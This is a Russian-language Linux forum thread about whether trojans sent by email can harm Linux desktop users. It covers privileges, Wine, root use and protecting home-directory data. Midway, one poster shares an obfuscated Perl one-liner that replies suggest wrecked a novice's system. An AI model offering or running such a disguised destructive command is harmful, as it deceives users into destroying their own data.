Trojan in linux

> Или я не прав?

Убунта на на подавляющем кол-ве десктопов. Это значит стандатное окружение. 

% ll /etc/alternatives/x-session-manager | grep "gnome" 
lrwxrwxrwx 1 root root 22 2009-06-03 19:37 /etc/alternatives/x-session-manager -> /usr/bin/gnome-session*

% ls ~/.config/autostart/
ktorrent.desktop  qstardict.desktop  tomboy.desktop

Дальше думай сам.

Идеальной надёжности не бывает, но это действительно хорошая причина использовать линукс вместо виндос.

>рассылка троянов(исполняемых файлов) по почте

виноват тот кто это запускает, проблема не в ОС , а в пользователе

> но он никогда не запустится

запустится, забываете про то что бинарники допустим linux x86 более менее одинаковы, для функций типичного трояна совместимости хватит,
Кроме того есть и скрипты (sh, perl, python)
другое дело что в системе это не генерализуется, а будет работать с правами пользователя, т.к. элевацию привилегий будет сделать непросто, но не невозможно


> хотябі из за этого линукс стоит ставить на десктопы

ставьте, можно подумать кто-то вам не дает этого делать.

Большинство проблем в голове. А именно под виндой принято работать под Админом, запускать все подряд, и что прислали по почте и что сами скачали с варезных сайтов, вирусам раздолье. Под Линуксом было принято работать под пользователем и ставить пакеты из дистрибутива. Правда это было, ИМХО, сейчас много народа сидит под рутом...

To: Silvy, mky

Господа. Абы..., кабы..., ... это всё рассуждения

ФАКТ: юзеру пришло письмо с вложением, которое он по глупости своей или любопытству пытается открыть.

Вот про это я говорю. В линуксе, данную ситуацию нельзя повторить(ну или тяжело).

Мне никто, не мешает ставить. Я не жалуюсь. Я делюсь своими мыслями, на тот случай, а вдруг я заблуждаюсь.
>запустится, забываете про то что бинарники допустим linux x86 более менее одинаковы, для функций типичного трояна совместимости хватит
Silvy, ты это про что? Обоснуй! Ато я нипонил.


>% ll /etc/alternatives/x-session-manager | grep "gnome"
>lrwxrwxrwx 1 root root 22 2009-06-03 19:37 /etc/alternatives/x-session-manager -> /usr/bin/gnome-session*
>% ls ~/.config/autostart/
>ktorrent.desktop qstardict.desktop tomboy.desktop
А это кто-нибуть объяснит?

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

если пользователь ССЗБ для него и вот такое станет достаточным

> Вот про это я говорю. В линуксе, данную ситуацию нельзя повторить(ну или тяжело).

Ты толстоват и глуповат, наверное.

Флудиш. Сообщние без смысла. Объясни, "худоватый и умноватый (наверное)". Да, много-го незнаю, ведь для того и форум, чтобы обмениваться знаниями (И явно не для того, чтобы такие умные как ты смеялись над другими).

dimakolev вышел из чата.

Silvy тебе не стыдно? вот теперь человек систему будет переставлять

"Глупость должна быть наказана!"

//Я моя тоже, если кто подумает о лицемерии.

На самой защищённой системе нельзя будет работать. Нельзя, пусть он в это просто поверит.

А как вы предлагаете обезопасить запуск каких-то скриптов, пришедших со спамом? Не дать прав на запись/удаление? SELinux/SMACK/RSBAC в зубы, если думать лениво. Да-да, оксюморон ^^.

>ИМХО, сейчас много народа сидит под рутом...

Кстати, где вы таких сидящих под рутом находите? Я лично ни одного не видел

Кстати, чтоб запустить скрипт он должен обладать x-битом. Что-то не помню почтовиков передающих права вложенных файлов

Ну почему же... из вебпочты сохраняем, кликаем... Наутилус ведь может скрипты пускать? Я просто сразу переключил на открытие, потому не знаю.

ну если он решил проверить это на себе - сочувствую, нельзя ж до такой степени то быть ссзб ) но зато на себе прочувствует всю концепцию своей темы )

Самая неприятная зараза, которую я видел на юниксовых серваках - это лядские корявые кривучие похапе-движки, которые _регулярно_ проламывают, через которые _регулярно_ спамят, или хуже того - превращают сервер в часть ботнета.

>perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

вы это в букмарках держите? :)

ну если считать Google хранилищем закладок, то да

>Кстати, чтоб запустить скрипт он должен обладать x-битом. Что-то не помню почтовиков передающих права вложенных файлов

ну при желании можно передавать тар с правами для. почтовые вирусы часто распространяли архивы себя.

>прислать по почте егзешнег(елья), можно, но он никогда не запустится,

Рассказать автору про вайн или не стоит?

>Или я не прав?

Не прав.

>линукс стоит ставить на десктопы.

Пожалей человечество...

>сейчас много народа сидит под рутом...

Кто??? ГДЕ????

>Да, много-го незнаю

"много-го" и я не знаю (Раздельно пишется, кстати). А вообще виндовые вирусы вполне неплохо чувствуют себя под линуксом. Потом слава человекам, есть привязка программ к типам файлов. И хула человекам есть человеки - гидроэнцифалы, которые тыкают и запускают все что под руку попадется...

ЗЫ: Для запуска приложений в вайне права рута не нужны.

>кривучие похапе-движки

Я всегда говорил, лучше добавить десяток гигов памяти и использовать энтерпрайзную Java.

>сейчас много народа сидит под рутом

O_o Да почти во всех дистрах уже или рута нет, или иксы под рутом не запустишь.

спорим, запущу? =)

Я про дефолтное поведение. Разрешить в убунте рута тоже дело пары секунд.

почему нельзя прислать exeшник по почте который автоматом откроется в wine при двойном клике?

толку от этого будет нуль. дальше пользователя такой экзешник, даже под вайном запущенный не выйдет далее чем папки юзверя.

это не вирус, это пакость обыкновенная.

нет. на любом языке можно написать кривой и кишащий багами быдлокод. тут не в языке дело к сожалению. похапе просто под руку попался.

>толку от этого будет нуль. дальше пользователя такой экзешник, даже под вайном запущенный не выйдет далее чем папки юзверя.

>это не вирус, это пакость обыкновенная.

Лично мне похрен на все содержимое / кроме /home, а там такая дрянь спокойно все зашифрует/удалит да и спамить ей никто не мешает

ОП, я надеюсь, ты смог запустить предложенный выше однострочник?

>не выйдет далее чем папки юзверя.

Как бы сказать, данные и прочее тоже лежат не за пределами папки юзера.. Смысл ковырять систему? Вот это пакость уже похуже.

>>рута нет

Отключен != нету.

>>иксы под рутом не запустишь

Щито? X запускается от root, другое дело, что подключиться к нему root'ом не позволят эти ваши gdm/kdm.

Именно! С каких пор ценность прикладного ПО стала превышать ценность уникальных пользовательских данных?

А вот незачем хранить данные в "~/*". Ну, просто не стоит. Я был бы рад искоробочному запрету на узменение файлов всяким браузерам, IM, сторонними софтинами... Хотя для запуска "левого" в Федоре специальные контейнеры пилят, вполне может стать простым решением.

>>А вот незачем хранить данные в "~/*"

Согласен. Пока обдумываю более рациональную структуру для размещения своего хлама :-).

>>Хотя для запуска "левого" в Федоре специальные контейнеры пилят

Виртуальные машины уже не в моде?

Громоздкие. Чего-то не прёт ради одного бинарника вторую систему ставить. Chroot тоже не всегда выход.

> А вот незачем хранить данные в "~/*". Ну, просто не стоит.

Толстеешь. А где еще данные юзеру хранить, как не у себя в домике?

> Я был бы рад искоробочному запрету на узменение файлов всяким браузерам, IM, сторонними софтинами...

А как тогда IM будут писать логи, настройки? Если привязать файлы к приложению - как тогда эти самые логи читать? А логи IM - это и есть порой те самые юзерские данные, которые и надо хранить и защищать.

Изменение _сторонних_. Речь шла о каком-нибудь левом скрипте, способном попортить данные.

А хранить в /media/disk*, как сейчас обычно и выходит.

> Изменение _сторонних_. Речь шла о каком-нибудь левом скрипте, способном попортить данные.

А если это новая читалка для логов?

То ты её установишь и у неё _уже_ будут права :) В теории, если следовать идее об большем разграничении прав.

>>А где еще данные юзеру хранить, как не у себя в домике?

В домике пускай лежат .файлы и .каталоги, а данные лучше вынести отдельно. Да и музыкальные архивы, библиотеки и прочее подобное можно монтировать в r/o.

>Да почти во всех дистрах уже или рута нет

Ага, поэтому на всех линуксовых форумах и дают советы как вернуть рута на законное место и заодно все знают, что SeLinux надо нафиг отключать, чтобы не мешал.